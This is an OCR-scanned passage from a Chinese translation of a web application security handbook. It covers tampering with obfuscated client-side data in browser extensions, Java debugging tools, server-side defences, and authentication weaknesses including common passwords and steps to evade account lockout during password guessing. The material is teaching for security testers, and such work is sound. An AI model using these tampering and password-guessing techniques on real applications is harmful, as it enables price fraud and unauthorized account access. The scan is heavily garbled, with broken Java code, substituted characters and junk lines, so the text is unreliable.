Eor{int j = 0; j < s2.length(}; j++) 


String s3 (new StringBuilcer{))} .append({'d0') . append 
(Integer. toHexString({(byte})si.charAt({{j * 19 + 7) % sl.iengch({)) 
2.charAt(j))}.toString{); 


int k = s3.lenqth(); 
if(k > 2) 

s3 = s3.substring(k 2; ki? 
stringbui lcer.append([s3}; 


return stringbuilder.toString{); 


SLIME (900) HIRE RIC 
串 。 需 要 注意 的 是 ， 可 以 在 此 处 使 用 非 数 字 和 输入， 探查 应 用 程序 中 是 
存在 各 种 基于 输入 的 漏洞 。 


YY ”提示 ”Jad 程序 以 .jad 扩 展 名 保存 其 反 编译 的 源 代码 。 但 
ra See ens 需要 用 .java 扩 展 名 重 命名 每 
VHC o 


最 后 ， 需 要 使 用 Java SDK 自 带 的 javac 编 译 器 重新 编译 源 代 码 ， 然 后 
从 命令 Se 的 wa 


A A RERA A 





C:\tmp>java CheckQuant ie 
4b282c510f776a455đd425a7808015¢c555f42585460464d1e47684c414a152ble0b5a520a 
cn ‘ A 


现在 ， 经 过 修改 的 组 件 已 对 我 们 提交 的 任意 数量 (999) 进行 了 必 
要 的 模糊 处 理 。 要 对 服务 器 实施 攻击 ， 只 需 使 用 有 效 的 输入 以 正常 方式 
提交 订单 ， 使 用 代理 服务 器 拦截 生成 的 请 求 ， 并 用 经 过 修改 的 组 件 提供 
的 数量 将 换 经 过 模糊 处 理 的 数量 。 需 要 注意 的 是 ， 如 果 应 用 程序 在 每 次 
加 载 订单 时 都 发 布 一 个 新 的 模糊 包 Cobfuscation pad) ， 需 要 确保 返还 
给 服务 器 的 模糊 包 与 同时 提交 的 用 于 对 数量 进行 模糊 处 理 的 模糊 包 相 匹 
Ac 








尝试 访问 

以 下 示例 演示 了 上 述 攻 击 以 及 使 用 Silverlight 和 Flash 技 术 的 对 
应 攻击 : 

http://mdsec.net/shop/154/ 


http://mdsec.net/shop/167/ 
http://mdsec.net/shop/179/ 








要 了 解 和 攻击 浏览 器 扩展 ， 反 编译 是 最 全 面 可 靠 的 方法 。 但 是 ， 对 
于 包含 成 干 上 万 行 代码 、 功 能 复杂 的 大 型 组 件 而 言 ， 观 察 组 件 的 执行 过 
程 ， 并 将 其 中 的 方法 和 类 与 界面 中 的 关键 功能 进行 关联， 往往 会 更 加 简 

> MHE., 0 :可 以 避免 在 解释 和 反 编译 经 过 模糊 处 理 的 字 
节 码 时 遇 到 的 困难 。 常 ， 只 需要 执行 某 项 关键 功能 ， 更 改 其 行为 ， 以 
UA E E 即 可 达到 特定 目的 。 

由 于 调度 器 在 字 节 人 码 级 别 运 行 ， 因 此 ， 可 以 使 用 调试 器 轻松 控制 并 
了 解 组 件 的 执行 过 程 。 具 体 而 言 ， 如 果 可 以 通过 反 编译 获得 源 代码 ， 束 
可 以 在 特定 的 代码 行 设置 断 点 ， 并 通过 观察 组 件 在 执行 过 程 中 采用 的 代 
人 码 路 径 来 判定 通过 反 编译 获得 的 信息 是 否 正确 。 

虽然 针对 所 有 浏览 器 扩展 技术 的 高 效 调试 器 尚 不 成 熟 ， 但 Java 
applet 能 够 为 调度 提供 有 效 文 持 。JavaSnoop 是 目前 最 高 效 的 调度 器 。 
JavaSnoop 是 一 球 Java 调 试 器 ， 它 能 够 与 Jad 集 成 ， 以 用 于 反 编 译 源 代 
码 、 在 应 用 程序 中 跟踪 变量 ， 并 在 方法 中 设置 断 点 来 但 看 和 修改 参数 。 
JavaSnoop 可 用 于 直接 “ 钓 住 ” 在 浏览 占 中 运行 的 Java applet 〈 如 图 5-6 所 
AN) ， 并 可 用 于 复 改 方法 的 返回 值 〈 如 网 5-7 所 示 ) 。 


















































: [int StockSelector (String) 
int EventSelected(String) | 
int UlLaunch(String) 

void HelperUL(String) 

void LoginHelper (String) 


[E] Apply ruie to subclasses | _ Search for function... 
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图 5-7 确定 适当 的 方法 后 ， 可 以 使 用 JavaSnoop 算 改 方法 的 返回 值 


y 


注解 ”在 加 载 目标 applet 之 前 ， 最 好 首先 运行 JavaSnoop。 








JavaSnoop 将 取消 Java 安 全 策略 设置 的 限制 ， 以 便于 针对 目标 执行 操 
作 。 在 Windows 中 ，JavaSnoop 通 过 向 系统 中 的 所 有 Java 程 序 授 予 各 
种 权限 来 取消 限制 ， 因 此 ， 在 执行 操作 后 ， 需 要 确保 完全 关闭 
JavaSnoop 并 恢复 相关 权限 。 


JSwat 是 另 一 个 Java 调 试 工具 ， 该 工具 提供 大 量 配置 选项 。 有 时 ， 在 
含 许多 类 文件 的 大 型 项 目 中 ， 最 好 是 反 编译 、 修 改 并 重新 编译 关键 的 
类 文件 ， 然 后 使 用 JSwat 将 其 “ 热 包 装 ” 到 正在 运行 的 应 用 程序 中 。 要 使 
用 JSwat， 需 要 使 用 JDK 中 的 appletviewer 工 具 启 动 一 个 applet， 然 后 将 
JSwat 连 接 到 该 applet。 例 如 ， 可 以 使 用 以 下 命令 : 


appletviewer -J-Xdebug -J-Djava.compiler=NONE -J 











Xrunjdwp:transport=dt_socket, 
server=y,suspend=n,address=5000 appletpage.htm 


处 理 Silverlight 对 象 时 ， 可 以 使 用 Silverlight Spy 工具 监视 组 件 在 运 
行 时 的 执行 情况 。 在 将 相关 代 人 码 路 径 关 联 到 用 户 界面 中 的 事件 时 ， 该 工 
具 可 提供 很 大 的 帮助 。 下 载 Silverlight Spy 的 URL 如 下 所 示 : 

http ://firstfloorsoftware.com/S ilverlightSpy/ 


5.3.6 $ 1 yin Z 


一 些 应 用 程序 需要 在 用 户 的 计算 机 中 执行 基于 浏览 器 的 VM 沙 盒 内 
无 法 执行 的 操作 。 根 据 客户 端 安全 控制 ， 以 下 是 这 类 功能 的 一 些 示例 : 

口 验证 用 户 是 否 装 有 最 新 的 病毒 扫描 器 ; 

口 验证 代理 服务 器 设置 及 其 他 企业 配置 是 否 有 效 ; 

口 集 成 智能 卡 读 取 器 。 

通常 ， 这 些 操作 需要 使 用 本 地 代码 组 件 ， 这 些 组 件 将 集成 本 地 应 用 
程序 功能 和 Web 应 用 程序 功能 。 本 地 客户 端 组 件 一 般 通 过 ActiveX 控 件 
传送 。ActiveX 探 件 是 在 浏览 器 沙 盒 以 外 运行 的 定制 浏览 器 扩展 。 

由 于 没有 对 应 的 中 间 字 节 码 ， 相 比 于 其 他 浏览 器 扩展 ， 解 译本 地 客 
户 端 组 件 要 困难 得 多 。 但 是 ， 我 们 在 避 开 客户 端 控 件 时 采用 的 方法 对 于 
本 地 客户 端 组 件 仍然 适用 ， 不 过 ， 这 时 需要 采用 一 组 不 同 的 工具 。 以 下 
是 用 于 完成 这 个 任务 的 一 些 常用 工具 : 

口 OllyDbg 是 一 个 可 用 于 遍历 本 地 可 执行 代码 、 设 置 断 点 ， 并 在 磁 
可 上 或 在 运行 时 对 可 执行 文件 应 用 补丁 的 Windows 调 试 器 。 

口 IDA Pro 是 一 个 反 汇 编程 序 ， 它 可 以 将 大 量 平台 上 的 本 地 可 执行 











代码 反 汇 编 成 人 类 可 读 的 汇编 代码 。 
虽然 我 们 不 会 在 本 书 中 详细 介绍 有 关 逆 癌 工 程 的 信息 ， 但 是 ， 如 果 
， 了 解 逆 癌 工程 本 地 代码 组 件 及 相关 主题 ， 下 面 是 一 些 有 用 的 
资源 : 
DQ Reversing: Secrets of Reverse Engineering, Eldad Eilam # ; 
DQ Hacker Disassembling Uncovered, Kris Kaspersky ; 
DQ The Art of Software Security Assessment, Mark Dowd. John 
McDonald 和 Justin Schuh #; 
口 Fuzzing for Software Security Testing and Quality Assurance (Artech 
House Information Security and Privacy), Ari Takanen, Jared DeMott 和 
Charlie Miller ; 
W The IDA Pro Book: The Unofficial Guide to the World's Most Popular 
Disassembler, Chris Eagle 著 山 ; 
Dwww.acm.uiuc.edu/sigmil/RevEng ; 
Dwww.uninformed.org/?v=1&a=7。 





Sd BENE BETE 


如 前 所 述 ， 由 于 客户 端 组 件 和 用 户 输入 不 在 服务 器 的 直接 控制 范围 
内 ，Web 应 用 程序 的 核心 安全 面临 威胁 。 客 户 端 及 其 提交 的 所 有 数据 从 
本 质 上 讲 都 不 值得 信任 。 





许多 应 用 程序 之 所 以 存在 缺陷 ， 是 因为 它们 通过 客户 端 以 危险 的 方 
式 传 送 产品 价格 和 折扣 率 之 类 的 重要 数据 。 

如 果 可 能 ， 应 用 程序 应 完全 避免 通过 客户 端 传送 这 类 数据 。 在 几乎 
任何 一 种 可 能 出 现 的 情况 下 ， 都 可 以 将 这 类 数据 保存 在 服务 器 上 ， 并 在 
必要 时 通过 服务 器 端 逻 辑 直接 引用 。 人 例如， 接受 用户 购买 各 种 产品 而 提 
区 的 订单 的 应 用 程序 应 允许 用 户 提 区 产品 代码 和 数量 ， 并 在 服务 器 端 数 
据 库 中 查询 每 一 种 产品 的 价格 。 用 户 没 有 必要 癌 服 务 器 提交 产品 价格 。 
即使 应 用 程序 向 不 同 的 用 户 提供 不 同 的 价格 或 折扣 ， 也 不 必 抛 弃 这 种 模 
型 。 价 格 可 按 用 户 分 类 保存 在 数据 库 中 ， 而 折扣 率 则 保存 在 用 户 资 料 或 
会 话 对 象 中 。 应 用 程序 已 经 拥有 计算 某 一 特殊 用 户 所 购买 的 某 种 产品 的 
价格 所 需 的 一 切 信息 一 一 在 不 安全 的 模型 中 ， 它 必须 (除非 无 法 做 到 ) 
将 这 个 价格 保存 在 一 个 隐藏 的 表单 字段 中 。 

如 果 开 发 者 认为 他 们 别 无 选择 ， 只 有 通过 客户 疹 传送 重要 数据 ， 那 
么 应 当 对 数据 进行 签名 与 /或 加 密 处 理 以 防止 用 户 算 改 。 采 用 这 种 操作 
还 必须 避免 两 个 重要 的 威胁 。 

口 签名 或 加 密 数 据 可 能 易 受 重 传 攻击 (replay attack) 。 人 例如， 如果 
在 将 价格 保存 到 隐藏 表单 之 前 对 其 进行 加 密 ， 攻 击 者 就 可 以 用 一 个 更 加 
便宜 的 产品 的 加 密 价 格 代 蔡 最 初 的 产品 价格 。 为 防止 这 种 攻击 ， 应 用 程 
序 需 要 在 加 密 数 据 中 包含 足够 的 上 下 文 ， 以 防止 攻击 者 在 另 一 种 情况 下 
重新 传送 产品 价格 。 例 如 ， 应 用 程序 可 以 将 产品 代码 和 价格 组 合 在 一 
起 ， 将 得 到 的 字符 串 单独 加 和 密 ， 然 后 确认 随 订单 提交 的 加 和 密 字 符 串 是 否 
与 被 订购 的 产品 完全 匹配 。 

口 如 果 用 户 知道 并 /或 能 够 控制 送 交 给 他 们 的 加 密 字 符 串 的 明文 值 ， 
那么 他 们 就 可 以 实施 各 种 密码 攻击 ， 找 出 服务 器 使 用 的 加 密 密 钥 。 之 
后 ， 他 们 就 能 够 用 密 钥 加 密 任 意 值 ， 完 全 避 开 解决 方案 提供 的 保护 。 

对 于 在 ASP.NET 平 台 上 运行 的 应 用 程序 而 言 ， 建 议决 不 要 将 任何 定 
制 数 据 以 及 任何 你 不 希望 在 屏幕 上 向 用 户 显 示 的 敏感 数据 保存 在 


























ViewState 中 。 应 总 是 激活 用 于 局 用 ViewState MAC 的 选项 。 
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a a a 
口 可 轻易 避 开 HTML 表 单字 段 和 JavaScript 之 类 的 轻 量 级 客户 端 控 
无 法 保障 服务 器 收 到 的 输入 的 安全 性 。 

口 在 浏览 器 扩展 组 件 中 执行 的 控件 有 时 更 难以 避 开 ， 但 这 种 控件 只 
时 阻止 攻击 者 入 侵 。 

口 使 用 经 强化 模糊 处 理 或 压缩 的 客户 端 代 码 增 添 了 另 一 层 障 碍 ， 但 
蓄意 攻击 者 还 是 能 够 克服 这 些 障碍 。 (其 他 领域 的 类 似 处 理 是 使 用 











DRM 技 术 防 止 用 户 复 制 数 字 媒 体 文件 。 许 多 公司 在 客户 端 控 件 上 投入 


大 量 
保护 


资金 ， 但 每 一 种 新 型 解决 方案 通 闻 在 不 久 后 束 被 攻破 。 ) 
确认 客户 瑞生 成 数据 的 唯一 安全 方法 是 在 应 用 程序 的 服务 器 端 实施 
。 客 尸 关 提交 的 每 一 项 数据 都 应 被 视 为 危险 和 潜在 恶意 的 。 
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一 个 “重大 发 现 ”， 并 不 检验 服务 器 是 否 使 用 这 些 控件 或 者 使 用 它们 
是 否 出 于 非 安 全 考虑 。 实 际 上 ， 尽 管 本 章 描 述 的 各 种 攻击 能 够 产生 
T a a 
安全 漏洞 。 

口 客户 端 脚 本 可 用 于 确认 输入 ， 以 提高 可 用 性 ， 避 人 免 与 服务 占 
来 回 通 信 。 例 如 ， 如 果 用 户 输 入 的 出 生日 期 格式 不 正确 ， 通 过 客户 
端 脚 本 向 他 们 提出 警报 可 提供 更 加 无 颖 的 使 用 体验 。 当 然 ， 应 用 程 
序 必 须 对 之 后 提交 给 服务 器 的 数据 进行 重新 确认 。 

口 有 些 时 候 ， 客 户 端 数据 确认 可 以 与 安全 措施 一 样 有 效 例 
如 ， 通 过 它 防御 基于 DOM 的 跨 站 点 脚本 攻击 。 但 是 ， 许 多 时 候 攻 
击 的 直接 目标 是 另 一 名 应 用 程序 用 户 ， 而 不 是 服务 器 端 应 用 程序 。 
而 且 ， 利 用 潜在 的 漏洞 不 一 定 需 要 同 服 务 吉 传送 任何 恶意 数据 。 请 
参阅 第 12 章 和 第 13 章 了 解 有 关 这 种 情形 的 详细 内 容 。 

口 如 前 所 述 ， 有 许多 方法 可 通过 客户 端 传送 加 密 数 据 ， 而 不 会 
遭 到 破坏 或 重 传 攻击 。 


























5.4.3 meee” 


虽然 应 用 程序 采用 长 度 限 制 和 基于 JavaScript 的 确认 之 类 的 机 制 来 提 

高 性 能 与 可 用 性 ， 但 这 些 机 制 应 与 服务 器 端 入 侵 检测 防御 工具 组 合 使 
用 。 对 客户 端 提交 的 数据 进行 确认 的 服务 怖 端 逻辑 应 认识 到 ， 客 户 端 也 
采用 了 同样 的 确认 机 制 。 如 有 果 服 务 器 收 到 已 被 客户 端 阻止 的 数据 ， 应 用 
程序 可 能 会 据 此 推 有 着， 一 名 用 户 正 设法 避 开 这 种 确认 ， 因 此 这 些 数据 可 
能 是 恶意 的 。 应 用 程序 应 将 异 第 记录 到 日 志 中 ， 适 当 情 况 下 同 应 用 程序 
管理 员 发 出 实时 和 警报， 以 便 他 们 能 够 监控 任何 攻击 企图 ， 并 在 必要 时 采 
应 用 程序 还 会 主动 采取 防御 措施 ， 终 止 用 户 会 话 或 者 暂 
时 冻结 其 账户 
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-> 注解 ”有些 时 候 ， 虽 然 用 户 的 浏览 器 禁用 JavaScript， 但 他 
们 仍然 能 够 使 用 采用 JavaScript 的 应 用 程序 。 出 现 这 种 情况 ， 主 要 是 
因为 浏览 器 完全 忽略 了 基于 JavaScript 的 表单 确认 代码 ， 提 交 的 是 用 
户 输入 的 原始 信息 。 为 避免 错误 警报 ， 日 志 与 警报 机 制 应 了 解 这 种 
情况 会 在 什么 地 方 出 现 ， 会 如 何 发 生 。 


5.5 小结 


几乎 所 有 的 客户 端 -服务 器 应 用 程序 都 必须 接受 这 样 一 个 事实 ， 即 
客户 端 组 件 和 其 中 发 生 的 所 有 处 理 过 程 都 不 像 我 们 期 符 的 那样 值得 信 
任 。 如 前 所 述 ， 如 果 应 用 程序 使 用 “透明 的 ”通信 方法 ， 那 么 即使 经 验 尚 
浅 的 攻击 者 使 用 简单 的 工具 都 能 轻易 避 开 客户 端 执行 的 大 多 数控 件 。 束 
算是 应 用 程序 对 客户 端 数据 和 操作 进行 模 类 处理， 蓄意 破 坏 的 攻击 者 仍 
然 能 够 突破 这 些 防 御 。 

如 果 确 定 任 何 通过 客户 端 传 送 的 数据 ， 或 确认 客户 端正 在 执行 用 户 
提交 的 输入 ， 应 该 测试 服务 器 如 何 应 对 避 开 那些 控件 的 意外 数据 。 许 多 
人 因而 面 
Itty BL} o 





5.6 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 
C1) 通过 客户 端 传送 的 数据 如 何 阻止 破坏 性 攻击 ? 
(2) 应 用 程序 开发 者 希望 阻止 攻击 者 对 登录 功能 发 动 蛮 力 攻 击 。 
由 于 攻击 者 可 能 以 多 个 用 户 名 为 目标 ， 开 发 者 决定 将 登录 尝试 失 败 次 数 
保存 在 一 个 加 密 cookie 中 ， 阻 止 任何 失败 次 数 超过 5 次 的 请 求 。 有 什么 办 
法 能 够 避 开 这 种 防御 ? 
(3) 某 一 应 用 程序 包含 一 个 执行 严格 访问 控件 的 管理 页 面 。 该 页 
面 上 有 一 个 连接 到 男 一 台 Web 服 务 器 的 诊断 功能 链接 ， 只 有 管理 员 能 够 
访问 这 些 功 能 。 不 执行 另 一 种 验证 机 制 ， 下 列 哪 一 种 〈 如 果 有 的 话 ) 客 
户 端 机 制 可 用 于 为 诊断 功能 提供 安全 的 访问 控件 ? 要 选择 一 个 解雇 方 
案 ， 还 需要 了 解 其 他 信息 吗 ? 
(a) 诊断 功能 能 够 检查 HTTP Referer 消 息 头 ， 证 实 请 求 由 
主管 理 页 面 提交 。 
Cb) 诊断 功能 能 够 验证 收 到 的 cookie， 证 实 其 中 包含 访问 
主 应 用 程序 所 需 的 有 效 会 话 令 牌 。 
Cc) 主 应 用 程序 可 在 请 求 中 的 一 个 隐藏 字段 中 设置 一 个 
验证 令 牌 。 诊 断 功 能 能 够 确认 这 一 点 ， 证 实用 户 在 主 应 用 程序 
中 有 一 个 会 话 。 
(4) 如 果 一 个 表单 字段 的 属性 为 disabled=true， 那 么 它 就 不 会 和 表 
单 的 其 他 内 容 一 起 提交 。 如 何 才能 改变 这 种 情况 呢 ? 
(5) 应 用 程序 可 采取 什么 方法 确保 客户 端 执行 了 输入 确认 ? 
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从 概念 上 讲 ， 验 证 机 制 是 web 应 用 程序 所 有 安全 机 制 中 最 简单 的 
一 种 机 制 。 通 常 ， 应 从 用 程序 必须 核实 用 户 提交 的 用 户 名 和 密码 正确 与 
否 。 如 果 正 确 ， 就 允许 用 户 登录 ， 否 则 就 禁止 用 户 登录 ， 

验证 机 制 也 是 应 用 程序 防御 恶意 攻击 的 中 心机 制 。 它 处 在 防御 未 授 
权 访 问 的 最 前 沿 ， 如 果 用 户 能 够 突破 那些 防御 ， 他 们 通常 能 够 控制 应 用 
程序 的 全 部 功能 ， 自 由 访问 其 中 保存 的 数据 。 缺 乏 安全 稳定 的 验证 机 
制 ， 其 他 核心 安全 机 制 “ 如 会 话 管理 和 访问 控制 ) 都 无 法 有 效 实施 。 

设计 一 个 安全 的 验证 机 制 看 似 简单 ， 实 际 上 却 是 二 件 极其 麻烦 的 事 
情 。 在 现实 世界 中 ，Web 应 用 程序 验证 机 制 通常 是 最 薄弱 的 环节 ， 由 此 
攻击 者 能 够 获得 未 授权 访问 。 我 们 曾 见 过 无 数 应 用 程序 由 于 验证 机 制 存 
在 各 种 缺陷 而 被 攻破 的 实例 

本 章 将 详细 介绍 困扰 Web 应 用 程序 的 大 量 设计 和 执行 缺陷 。 这 些 缺 
陷 之 所 以 存在 ， 宇 要 是 因为 应 用 程序 设计 者 和 开发 者 无 法 回答 一 个 简单 
的 问题 。 攻击 省 针对 验证 机 制 实施 攻击 能 够 实现 什么 目标 ?在 绝 大 多 数 
情况 下 ， 只 时 认真 分 析 一 下 某 个 应 用 程序 ， 就 可 以 发 现 许多 潜在 的 汤 
洞 ， 其 中 任何 一 个 都 足以 破坏 应 用 程序 。 

许多 最 常见 的 验证 漏洞 实际 上 极其 简单 。 任 何人 都 可 以 在 登录 表单 
中 输入 字 员 中 的 单词 ， 试 图 猜测 有 效 的 密码 ”另外 ， 应 用 程序 审 也 隐藏 
着 一 些 细微 的 缺陷 ， 只 有 对 复杂 的 多 阶段 登录 机 制 进 行 仔细 分 析 后 才能 
发 现 它们 并 对 其 加 以 利用 。 本 章 将 全 面 描述 这 些 攻击 ， 包 括 那些 成 功 突 
彼 一 些 最 安全 、 仿 御 最 稳健 的 Web 应 用 程序 的 验证 机 制 的 技巧 、 
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当 执行 验证 机 制 时 ，Web 应 用 程序 开发 者 可 以 采用 各 种 不 同 的 技 


口 基于 HTML 表 单 的 验证 ; 
口 多 元 机 制 ， 如 组 合 型 密码 和 物理 令 牌 ; 
口 客 户 端 $SSL 证 书 或 智能 卡 ; 
口 HTTP 基 本 和 摘要 验证 ; 
口 使 用 NTLM 或 Kerberos 整 合 Windows 的 验证 ; 
口 验证 服务 。 
到 目前 为 止 ，Web 应 用 程序 中 最 常用 的 验证 机 制 是 使 用 HTML 表 单 
获取 用 户 名 和 和 密码， 并 将 它们 提交 给 应 用 程序 。 因 特 网 上 90% 以 上 的 应 
用 程序 都 采用 这 种 机 制 |。 

在 更 加 注重 安全 的 因特网 应 用 程序 〈 如 电子 银行 ) 中 ， 这 种 基本 的 
机 制 通常 扩展 到 几 个 阶段 ， 要 求 用 户 提 交 其 他 证 书 ， 如 PIN 号 码 或 从 机 
密 字 中 选择 的 字符 。HTML 表 单 仍 主 要 用 于 获取 相关 数据 。 

最 为 注重 安全 的 应 用 程序 (如 为 进行 巨额 交易 的 个 人 提供 服务 的 私 
人 银行 ) 通常 采用 使 用 物理 令 牌 的 多 元 机 制 。 这 些 令 牌 通常 产生 一 组 一 
次 性 口令 ， 或 者 基于 应 用 程序 指定 的 输入 执行 一 个 质询 - 啊 应 功能 。 随 
着 这 种 技术 的 成 本 日 渐 降 低 ， 可 能 会 有 更 多 应 用 程序 采用 这 种 机 制 。 但 
是 ， 许 多 这 类 解决 方案 实际 上 无 法 解决 它们 由 在 解决 的 威胁 ， 主 要 是 钓 
鱼 攻击 和 使 用 客户 端木 马 的 威胁 。 

一 些 Web 应 用 程序 使 用 客户 端 SSL 证 书 或 在 智能 卡 中 执行 加 密 机 
制 。 但 是 ， 由 于 管理 和 分 配 这 些 项 目的 成 本 非常 高 晶 ， 通 常 只 有 那些 用 
户 不 多 的 安全 极其 重要 的 应 用 程序 才 会 使 用 它们 。 

因特网 上 的 应 用 程序 很 少 使 用 基于 HTTP 的 验证 机 制 〈 基 本 、 摘 要 
和 整合 Windows 的 机 制 )， 企 业内 联网 更 常 采用 这 种 机 制 。 这 时 ， 组 织 
内 部 用 户 提 供 标准 的 网 络 或 域 证 书 ， 应 用 程序 通过 以 上 一 种 技术 对 其 进 
行 处 理 ， 再 允许 用 户 访问 企业 应 用 程序 。 

一 些 应 用 程序 还 采用 Microsoft Passport 之 类 的 第 三 方 验证 服务 ， 但 
和 暂时 这 种 机 制 尚未 得 到 大 量 使 用 。 

大 多 数 与 验证 有 关 的 漏洞 和 攻击 适用 于 上 面 提 到 的 任何 一 种 技术 。 
由 于 绝 大 多 数 应 用 程序 普 珊 采用 基于 HTML 表 单 的 验证 ， 我 们 将 描述 每 
2 eee 以 及 与 其 他 可 用 技术 有 关 的 主要 差异 

I 攻击 方法 。 





























6.2 Ki 设计 缺陷 


与 Web 应 用 程序 常用 的 任何 其 他 安全 机 制 相 比 ， 验 证 功能 中 存在 着 
更 多 设计 方面 的 薄弱 环节 。 即 使 在 基于 用 户 名 和 密码 验证 用 户 这 种 非常 
简单 的 标准 化 模型 中 ， 其 中 包含 的 设计 缺陷 也 容易 导致 应 用 程序 被 非法 
访问 。 





6.2.1 密码 保密 性 不 


许多 Web 应 用 程序 没有 或 很 少 对 用 户 密码 的 强度 进行 控制 。 应 用 程 
序 常 剃 使 用 下 列 形式 的 密码 : 

口 非常 短 或 空白 的 密码 ; 

口 以 常用 的 字典 词汇 或 名 称 为 密码 ; 

口 密码 和 用 户 名 完全 相同 ; 

o 仍然 使 用 默认 密码 。 

图 6-1 是 一 个 实施 脆弱 密码 强度 规则 的 实例 。 通 常 ， 终 端 用 户 很 少 
具有 安全 意识 。 因 此 ， 没 有 实施 严格 密码 标准 的 应 用 程序 很 可 能 包含 大 
量 使 用 脆弱 密码 的 用 户 账 户 。 攻 击 者 很 容易 束 可 猜测 出 这 些 密 码 ， 从 而 
对 应 用 程序 进行 未 授权 访问 。 
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图 6-1 -个 实施 脆弱 密码 强度 规则 的 应 用 程序 





渗透 测试 步 又 


设法 碍 明 任 何 与 密码 强度 有 关 的 规则 。 

(1) 浏览 该 Web 站 点 ， 碍 找 任何 描述 上 述 规则 的 内 容 。 

(2) 如 果 可 以 进行 自我 注册 ， 用 不 同 种 类 的 脆弱 密码 注册 几 
个 账户 ， 了 解 应 用 程序 采用 何 种 规则 。 

(3) 如 果 拥 有 一 个 账户 并 且 可 以 更 改 密码 ， 试 着 把 密码 更 改 
为 各 种 脆弱 密码 。 
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> 注解 ”如 果 应 用 程序 仅 通 过 客户 站 控件 实施 密码 强度 规 
则 ， 这 本 里 并 不 是 一 个 安全 问题 ， 因 为 普通 用 户 仍 然 受 到 保护 。 虽 
然 诡 计 多 站 的 攻击 者 可 为 自己 分 配 脆 弱 密 码 ， 但 这 通常 并 不 会 给 应 
用 程序 造成 威胁 。 











尝试 访问 


http://mdsec.net/auth/217/ 


6.2.2 28 7 Wit SK 


登录 功能 的 公开 性 往往 诱 使 攻击 者 试图 猜测 用 户 名 和 密码 ， 从 而 获 
得 未 授权 访问 应 用 程序 的 权力 。 如 果 应 用 程序 允许 攻击 者 使 用 不 同 的 密 
码 重 复 进 行 登 录 答 试 ， 直 到 找到 正确 的 密码 ， 那 么 它 就 非常 容易 遭受 攻 
a 
aes 
最 近 一 些 知 名 站 点 沦陷 ， 成 干 上 万 个 现实 世界 中 的 密码 也 随 之 泄 
漏 ， 这 些 密 码 或 者 以 明文 形式 存储 ， 或 者 使 用 可 弯 力 攻击 的 散 列 存储 。 
现实 世界 中 的 一 些 最 常见 的 密码 如 下 所 示 : 
D password 
口 网 站 名 称 
D 12345678 
DQ qwerty 
g abc123 
D111111 
DQ monkey 
口 12345 
口 letmein 
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O 注解 管理 员 密码 实际 上 比 密码 策略 允许 的 更 为 脆弱 。 它 
们 可 能 在 实施 密码 策略 之 前 就 已 设置 或 者 通过 其 他 应 用 程序 或 界 
设 


在 这 种 情况 下 ， 精 明 的 攻击 者 会 根据 元 长 的 币 用 密码 列表 ， 使 用 目 


动 技 巧 答 试 猜测 出 密码 。 依 赖 今 天 的 带宽 和 处 理 能 力 ， 通 过 普通 PC 和 
DSL 连 接 ， 攻 击 者 每 分 钟 就 可 以 友 出 数 干 个 登录 尝试 。 这 样 ， 即 使 最 强 
大 的 密码 最 终 也 会 被 攻破 。 

我 们 将 在 第 14 章 详细 描述 实施 密 力 登录 的 各 种 上 自动 技巧 和 工具 。 使 
HH Burp Intruder 对 一 个 账户 成 功 实施 密码 猜测 攻击 的 过 程 如 图 6-2 所 示 。 
我 们 可 通过 HTTP 啊 应 码 、 啊 应 长 度 及 缺乏 “登录 错误 ”* 消 姑 等 差异 清楚 
区 分 成 功 的 登录 尝试 。 
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图 6-2 ”成功 实施 密码 猜测 的 攻击 示例 


一 些 应 用 程序 使 用 客户 端 控件 防止 密码 猪 测 攻击 。 例 如 ， 某 个 应 用 
程序 可 能 会 设置 cookie failedlogins = 1， 如 果 登 录 尝 试 失败 ， 递 增 这 个 
值 。 达 到 某 个 上 限 后 ， 服 务 器 将 在 提交 的 cookie 中 检测 这 个 值 ， 并 拒绝 
处 理 登 录 演 试 。 这 种 客户 端 防御 可 防止 仅 使 用 浏览 喜 实 施 的 手动 攻击 ， 
但 如 第 5 章 所 述 ， 这 种 防御 可 轻易 避 开 。 

如 果 登 录 失 败 计 数 堪 保存 在 当前 会 话 中 ， 这 时 就 会 出 现 前 一 个 漏洞 
的 变化 形式 。 虽 然 在 客户 端 并 没有 表明 该 漏洞 存在 的 任何 迹象 ， 但 攻击 
者 只 需要 获得 一 个 全 新 的 会 话 〈 例 如 ， 通 过 保留 会 话 cookie) 即 可 继续 
实施 密码 猜测 攻击 。 





最 后 ， 在 茶 些 情况 下 ， 应 用 程序 会 在 失败 的 登录 尝试 达到 一 定 次 数 
后 锁定 目标 账户 。 但 是 ， 它 会 通过 表明 (或 允许 攻击 者 推测 ) 所 提交 的 
密码 是 否 正 确 的 消息 ， 对 随后 的 登录 答 试 作出 啊 应 。 这 意味 着 ， 即 使 目 
标 账户 被 锁定 ， 攻 击 者 仍然 可 以 完成 密码 猜测 攻击 。 如 果 应 用 程序 在 一 
段 时 间 后 目 动 解除 账户 的 锁定 状态 ， 则 攻击 者 只 需要 等 到 这 一 时 刻 ， 然 
后 即 可 使 用 发 现 的 密码 正 第 登录 。 








渗透 测试 步 又 


(1) 用 控制 的 某 个 账户 手动 提交 几 个 错误 的 登录 尝试 ， 监 挥 
接收 到 的 错误 消息 。 

(2) 如 果 应 用 程序 在 大 约 10 次 登录 失败 后 还 没有 返回 任何 有 
关 账 户 锁定 〈account lockout) 的 消息 ， 再 尝试 正确 登录 。 如 果 登 
录 成 功 ， 应 用 程序 可 能 并 未 采用 任何 账户 锁定 策略 。 

G) 如 果 账 户 被 锁定 ， 可 以 尝试 重复 使 用 不 同 的 账户 。 如 果 
应 用 程序 发 布 任何 cookie， 这 次 可 以 将 每 个 cookie 仅 用 于 一 次 登录 
尝试 ， 并 为 随后 的 每 次 登录 尝试 获取 新 cookie。 

(4) 此外， 如果 账户 被 锁定 ， 应 查看 与 提交 无 效 密码 相 比 ， 
提交 有 效 密码 是 否 会 导致 应 用 程序 的 行为 出 现任 何 差异 。 如 果 确 实 
如 此 ， 则 可 以 继续 实施 密码 猜测 攻击 ， 即 使 账户 被 锁定 。 

(5) 如 果 没 有 控制 任何 账户 ， 尝 试 枚 举 一 个 有 效 的 用 户 名 
A 并 使 用 它 提交 几 次 错误 登录 ， 监 控 有 关 账 户 锁定 的 
HRY IS 

(6) ARORA WHAT, PFC BA MHA Ee Mal DY KT 5 ACE 
ae 的 行为 差异 ， 以 此 分 清 它们 在 上 自动 攻击 过 程 中 表现 出 的 区 
别 。 

C7) 列 出 已 枚 举 出 的 或 常见 的 用 户 名 列表 和 常用 密码 列表 。 
